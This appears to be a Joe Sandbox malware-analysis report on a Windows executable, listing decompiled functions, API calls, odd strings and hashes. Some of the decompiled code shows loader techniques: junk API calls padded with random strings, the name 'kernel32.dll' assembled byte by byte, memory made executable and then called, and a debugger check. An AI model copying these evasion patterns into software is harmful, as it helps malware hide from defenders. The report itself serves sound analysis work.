CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00406341
SetConsoleCtrlHandler.KERNEL32(00000000,00000000), ref: 00406360
AddAtomW.KERNEL32(Nalid cinunec), ref: 0040636B
lstrcpynA.KERNEL32(?,00000000,00000000), ref: 0040637A
SetFileShortNameW.KERNEL32(00000000,bawum), ref: 00406386
GetFileType.KERNEL32(00000000), ref: 004063DC
FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004063E5
GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 004063FE
GetUserDefaultLangID.KERNEL32 ref: 00406404
LoadLibraryA.KERNEL32(msimg32.dll), ref: 00406412

Strings

Tgt, xrefs: 00405BE9
Nalid cinunec, xrefs: 00406366
0.txt, xrefs: 0040621D
@:?:, xrefs: 00406095
lJ, xrefs: 00405E6F
padumojerupodivufojonabahusemufikeserivifaleb, xrefs: 004061E7
kq`E, xrefs: 00405CC1
Cah, xrefs: 00405DB2
msimg32.dll, xrefs: 0040640D
miputuwudukabocayuvehom, xrefs: 00406297
&v1>, xrefs: 00405D57
/,cZ, xrefs: 00405FC0
j[aj, xrefs: 00405EB3
bawum, xrefs: 00406380

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: FileName$ConsoleCreateDefaultFindGlobalH_prologHandle_feof$AliasAllocAtomChangeCloseComputerCountCtrlDataErrorEventFirstFoldFromHandlerHttpLangLastLibraryLoadLongMutexNextNotificationOpenPathProcessProtectQueryResetShortStringSystemTimerTypeUserVersionVirtualWaitableWire__wfopen_s_fprintf_fsetpos_putslstrcpyn
String ID: lJ$&v1>$/,cZ$0.txt$@:?:$Cah$Nalid cinunec$Tgt$bawum$j[aj$kq`E$miputuwudukabocayuvehom$msimg32.dll$padumojerupodivufojonabahusemufikeserivifaleb
API String ID: 1493176409-4139528676
Opcode ID: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
Instruction ID: bb73222b721ae5790bf0f43ae7b398a59fbe0ad7c8ad8c6f35e93601ff7b34d9
Opcode Fuzzy Hash: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
Instruction Fuzzy Hash: 6F428AB5A01358DFCB24CFAADA896CEBBB4FF15354F504059F949AB610C7348A81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040D805 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D805(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x42eb04 = _t6;
				if(_t6 != 0) {
					 *0x42f134 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d81a
0x0040d820
0x0040d827
0x0040d82e
0x0040d834
0x0040d82a
0x0040d82a
0x0040d82a

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D81A

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
Instruction ID: fd85ce2fcb67921a389e6ce4cb0a7bbe92cde3a7c9e0599c9ee6dbe1732e0889
Opcode Fuzzy Hash: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
Instruction Fuzzy Hash: BAD0A732A513049FDB10AFB1BD097323BDCD3847A5F408436B90DD61A0F574ED52C648

Uniqueness

Uniqueness Score: -1.00%

Function 00409D17 Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409D17() {
				void* _t1;

				_t1 = E00409CA5(0); // executed
				return _t1;
			}

0x00409d19
0x00409d1f

APIs

__encode_pointer.LIBCMT ref: 00409D19

Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CB7
Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000004,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CCE
Part of subcall function 00409CA5: RtlEncodePointer.NTDLL(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409D0C

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: a16bc2a155c058482eeeff35459f6d4b366902e2d4f8f65c91ebe27a5e0a607d
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004077DB Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E004077DB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x42c770; // 0xd4647818
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x42ec10 = _t6;
				 *0x42ec0c = _t22;
				 *0x42ec08 = _t25;
				 *0x42ec04 = _t21;
				 *0x42ec00 = _t27;
				 *0x42ebfc = _t26;
				 *0x42ec28 = ss;
				 *0x42ec1c = cs;
				 *0x42ebf8 = ds;
				 *0x42ebf4 = es;
				 *0x42ebf0 = fs;
				 *0x42ebec = gs;
				asm("pushfd");
				_pop( *0x42ec20);
				 *0x42ec14 =  *_t31;
				 *0x42ec18 = _v0;
				 *0x42ec24 =  &_a4;
				 *0x42eb60 = 0x10001;
				_t11 =  *0x42ec18; // 0x0
				 *0x42eb14 = _t11;
				 *0x42eb08 = 0xc0000409;
				 *0x42eb0c = 1;
				_t12 =  *0x42c770; // 0xd4647818
				_v812 = _t12;
				_t13 =  *0x42c774; // 0x2b9b87e7
				_v808 = _t13;
				 *0x42eb58 = IsDebuggerPresent();
				_push(1);
				E00409C9D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x402814);
				if( *0x42eb58 == 0) {
					_push(1);
					E00409C9D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D986
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D99B
UnhandledExceptionFilter.KERNEL32(00402814), ref: 0040D9A6
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D9C2
TerminateProcess.KERNEL32(00000000), ref: 0040D9C9

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
Instruction ID: fe692e2c2471a191408ecafd0a3b7612e04458c4672b6b453b9975c369e636a9
Opcode Fuzzy Hash: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
Instruction Fuzzy Hash: 39210775A04244CFD720DFA7EE49A443BE0FB08310F90443AE50AA72B1DBB46986CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040573C Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 93
memoryfilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0040573C(void* __ecx, unsigned int __edx, intOrPtr _a4) {
				void* _v6;
				struct _COORD _v8;
				unsigned int _v12;
				long _v16;
				long _v20;
				struct _INPUT_RECORD _v40;
				char _v1064;
				short _v3112;
				short _v5160;
				void* _t15;
				void* _t16;
				void* _t37;
				unsigned int _t42;

				_t15 = E00406B10(0x1424);
				_t42 = __edx >> 3;
				if(_t42 > 0) {
					_t37 = __ecx;
					_v12 = _t42;
					do {
						if( *0x42e644 == 0x5d) {
							GlobalGetAtomNameA(0,  &_v1064, 0);
							PeekConsoleInputW(0,  &_v40, 0,  &_v20);
							GetPrivateProfileStringW(0, 0, 0, 0, 0, 0);
							GetShortPathNameW(L"rawurumuxe",  &_v3112, 0);
							__imp__GetConsoleAliasA(0, 0, 0, 0);
							_v8.X = 0;
							asm("stosw");
							WriteConsoleOutputCharacterW(0, L"yetuzohapimupukugegisufaxinu", 0, _v8,  &_v16);
							VirtualAlloc(0, 0, 0, 0);
							SearchPathA("kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu", "lohulomazuvepupanezewevewimafof", 0, 0, 0, 0);
							DeleteFileW(0);
							LoadLibraryW(L"genibutozetinoyegazuzatozes");
							IsBadCodePtr(0);
							GetModuleFileNameW(0,  &_v5160, 0);
							EnumResourceTypesA(0, 0, 0);
						}
						_t16 = E00405599(_t37, _a4, 0);
						_t37 = _t37 + 8;
						_t12 =  &_v12;
						 *_t12 = _v12 - 1;
					} while ( *_t12 != 0);
					return _t16;
				}
				return _t15;
			}

APIs

GlobalGetAtomNameA.KERNEL32 ref: 00405774
PeekConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405784
GetPrivateProfileStringW.KERNEL32 ref: 00405790
GetShortPathNameW.KERNEL32 ref: 004057A3
GetConsoleAliasA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057AD
WriteConsoleOutputCharacterW.KERNEL32(00000000,yetuzohapimupukugegisufaxinu,00000000,?,?), ref: 004057CC
VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057D6
SearchPathA.KERNEL32(kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu,lohulomazuvepupanezewevewimafof,00000000,00000000,00000000,00000000), ref: 004057EA
DeleteFileW.KERNEL32(00000000), ref: 004057F1
LoadLibraryW.KERNEL32(genibutozetinoyegazuzatozes), ref: 004057FC
IsBadCodePtr.KERNEL32 ref: 00405803
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00405812
EnumResourceTypesA.KERNEL32 ref: 0040581B

Strings

lohulomazuvepupanezewevewimafof, xrefs: 004057E0
yetuzohapimupukugegisufaxinu, xrefs: 004057C6
genibutozetinoyegazuzatozes, xrefs: 004057F7
kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu, xrefs: 004057E5
rawurumuxe, xrefs: 0040579E

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: ConsoleName$FilePath$AliasAllocAtomCharacterCodeDeleteEnumGlobalInputLibraryLoadModuleOutputPeekPrivateProfileResourceSearchShortStringTypesVirtualWrite
String ID: genibutozetinoyegazuzatozes$kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu$lohulomazuvepupanezewevewimafof$rawurumuxe$yetuzohapimupukugegisufaxinu
API String ID: 2519718940-461694913
Opcode ID: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
Instruction ID: b0c5818164c8b2c279455538c364471d95fd1b1af7f0e09314901615d566d303
Opcode Fuzzy Hash: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
Instruction Fuzzy Hash: 68212872502524BBC711AB919E48CDF7F7CEF4A3917004076F64AF1461C6385685CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 00409E0C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00409E0C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x417988);
				E0040C128(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040CC73(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402798;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x42cc70;
				E0040DB4D(_t35, 1, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E00409EE1();
				E0040DB4D(_t35, 1, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x42d278; // 0x42d1a0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E0040F2F9( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040C16D(E00409EEA());
			}

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00417988,0000000C,00409F47,00000000,00000000), ref: 00409E1E
__crt_waiting_on_module_handle.LIBCMT ref: 00409E29

Part of subcall function 0040CC73: Sleep.KERNEL32(000003E8,00000000,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC7F
Part of subcall function 0040CC73: GetModuleHandleW.KERNEL32(?,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC88

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00409E52
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00409E62
__lock.LIBCMT ref: 00409E84
InterlockedIncrement.KERNEL32(0042CC70), ref: 00409E91
__lock.LIBCMT ref: 00409EA5
___addlocaleref.LIBCMT ref: 00409EC3

Strings

DecodePointer, xrefs: 00409E5A
EncodePointer, xrefs: 00409E46
KERNEL32.DLL, xrefs: 00409E18, 00409E1D, 00409E28

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
Instruction ID: 6ad4f0a12971139d9532a4c3a171173a4d2e78e68cd5d816e784cf29c2ced9c8
Opcode Fuzzy Hash: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
Instruction Fuzzy Hash: FC116D71940701DAE720EF76D945B5ABBE0AF05314F10453EE499B62E1CB78A940CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040563B Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107
pipetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 0040563B
WaitNamedPipeW.KERNEL32(luhovire,00000000), ref: 00405685
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405695
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040569F
OpenWaitableTimerA.KERNEL32(00000000,00000000,Camivanihaza dulaxow), ref: 004056AC
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004056B8

Strings

Camivanihaza dulaxow, xrefs: 004056A5
luhovire, xrefs: 00405680

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: CompareConsoleCreateEventExchangeInputInterlockedMountNamedOpenPipePointReadTimerVolumeWaitWaitable
String ID: Camivanihaza dulaxow$luhovire
API String ID: 3983037427-2293185549
Opcode ID: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
Instruction ID: e0417459ce5708b3d2944c1299cadaac4ca3c3044ba0b9f4daa45e8deca22c17
Opcode Fuzzy Hash: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
Instruction Fuzzy Hash: EA41C3B1E01219EFCB50CFA9DA899DEBBB4FF19314F50406AE515F2250D3349A41CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406429 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00406429(void* __eflags) {
				char _v2048;
				intOrPtr _t2;
				short _t4;
				short _t5;
				short _t7;
				short _t8;
				short _t9;
				short _t10;
				short _t11;
				short _t12;
				short _t13;
				short _t14;
				intOrPtr* _t21;
				void* _t24;
				void* _t32;

				_t2 =  *0x41c7ac; // 0xfff5ca55
				 *0x42e644 = _t2;
				 *0x42e644 =  *0x42e644 + 0xb2d3b;
				_t4 = 0x6e;
				 *0x42dcde = _t4;
				_t5 = 0x33;
				 *0x42dce4 = _t5;
				 *0x42dcf0 = 0;
				_t7 = 0x2e;
				 *0x42dce8 = _t7;
				_t8 = 0x6b;
				 *0x42dcd8 = _t8;
				_t9 = 0x6c;
				 *0x42dcec = _t9;
				_t10 = 0x64;
				 *0x42dcea = _t10;
				_t11 = 0x6c;
				 *0x42dcee = _t11;
				 *0x42dce2 = _t11;
				_t12 = 0x32;
				 *0x42dce6 = _t12;
				_t13 = 0x65;
				 *0x42dcda = _t13;
				 *0x42dce0 = _t13;
				_t14 = 0x72;
				 *0x42dcdc = _t14;
				E00405A6B(_t32);
				_t24 = 0x184cc;
				do {
					if( *0x42e644 == 0x1833b) {
						__imp__GetVolumePathNameW(L"nulunowuyekufuneyaxesor",  &_v2048, 0);
						FindFirstChangeNotificationW(0, 0, 0);
						GetFileAttributesA(0);
						SetComputerNameA("Basiyixeyifopug saluzoha");
						__imp__SetCalendarInfoW(0, 0, 0, 0);
						GetFileType(0);
						__imp__SetFileShortNameW(0, 0);
					}
					_t24 = _t24 - 1;
				} while (_t24 != 0);
				_t21 =  *0x42dc24; // 0x6ef814
				 *0x42dccc = _t21;
				 *_t21();
				return 0;
			}

APIs

Part of subcall function 00405A6B: __EH_prolog.LIBCMT ref: 00405A74
Part of subcall function 00405A6B: GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
Part of subcall function 00405A6B: VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
Part of subcall function 00405A6B: GetLastError.KERNEL32 ref: 00405AB8

GetVolumePathNameW.KERNEL32(nulunowuyekufuneyaxesor,00000000,00000000), ref: 004064D7
FindFirstChangeNotificationW.KERNEL32(00000000,00000000,00000000), ref: 004064E0
GetFileAttributesA.KERNEL32(00000000), ref: 004064E7
SetComputerNameA.KERNEL32(Basiyixeyifopug saluzoha), ref: 004064F2
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004064FC
GetFileType.KERNEL32(00000000), ref: 00406503
SetFileShortNameW.KERNEL32(00000000,00000000), ref: 0040650B

Strings

Basiyixeyifopug saluzoha, xrefs: 004064ED
nulunowuyekufuneyaxesor, xrefs: 004064D2

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: FileName$AllocAttributesCalendarChangeComputerErrorFindFirstGlobalH_prologInfoLastNotificationPathProtectShortTypeVirtualVolume
String ID: Basiyixeyifopug saluzoha$nulunowuyekufuneyaxesor
API String ID: 164344972-2523395033
Opcode ID: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
Instruction ID: fb966b0e15d71144b0bd22afb04916c9cf462eaa64a8b83c211263f238221873
Opcode Fuzzy Hash: d16b5b8b8dce798c8910399fb24713b1cd0e9d9bf659044b153efeb6c29e3b30
Instruction Fuzzy Hash: A2218E76B55280AAE330CBA2FD09AA63768FF54B20F504437F545D61B0DBB50582CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5A2 Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E0040A5A2(intOrPtr __ecx) {
				void* _t47;
				intOrPtr _t48;
				void* _t53;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_push(0x2c);
				_push(0x417a78);
				E0040C128(_t47, _t54, _t56);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00407063(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00409F6C(__ecx, _t53, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c));
				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E00409F6C(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E00407108(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E0040A6C8(_t48, _t53, _t55, _t57, _t61);
				return E0040C16D( *((intOrPtr*)(_t58 - 0x1c)));
			}

APIs

__CreateFrameInfo.LIBCMT ref: 0040A5CA

Part of subcall function 00407063: __getptd.LIBCMT ref: 00407071
Part of subcall function 00407063: __getptd.LIBCMT ref: 0040707F

__getptd.LIBCMT ref: 0040A5D4

Part of subcall function 00409F6C: __getptd_noexit.LIBCMT ref: 00409F6F
Part of subcall function 00409F6C: __amsg_exit.LIBCMT ref: 00409F7C

__getptd.LIBCMT ref: 0040A5E2
__getptd.LIBCMT ref: 0040A5F0
__getptd.LIBCMT ref: 0040A5FB
_CallCatchBlock2.LIBCMT ref: 0040A621

Part of subcall function 00407108: __CallSettingFrame@12.LIBCMT ref: 00407154

Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6D7
Part of subcall function 0040A6C8: __getptd.LIBCMT ref: 0040A6E5

Memory Dump Source

Source File: 0000000C.00000002.513969633.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.513942243.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514209611.000000000041C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514428932.000000000042C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000C.00000002.514513201.0000000000431000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_sifdvgf.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
Instruction ID: 7e684faa2fd1f334b094959b8f169ed2d54e211e7372e57f7a86f5eb42b7bb83
Opcode Fuzzy Hash: 8f1d90696a2688ea3936d7946fe7d803b2a0bbc8f3439a3d33c7f88237b36b18
Instruction Fuzzy Hash: 4E110AB1C00309DFDF00EFA5D845AAD77B0FF08314F10856AF894AB292DB399A119F59

Uniqueness

Uniqueness Score: -1.00%

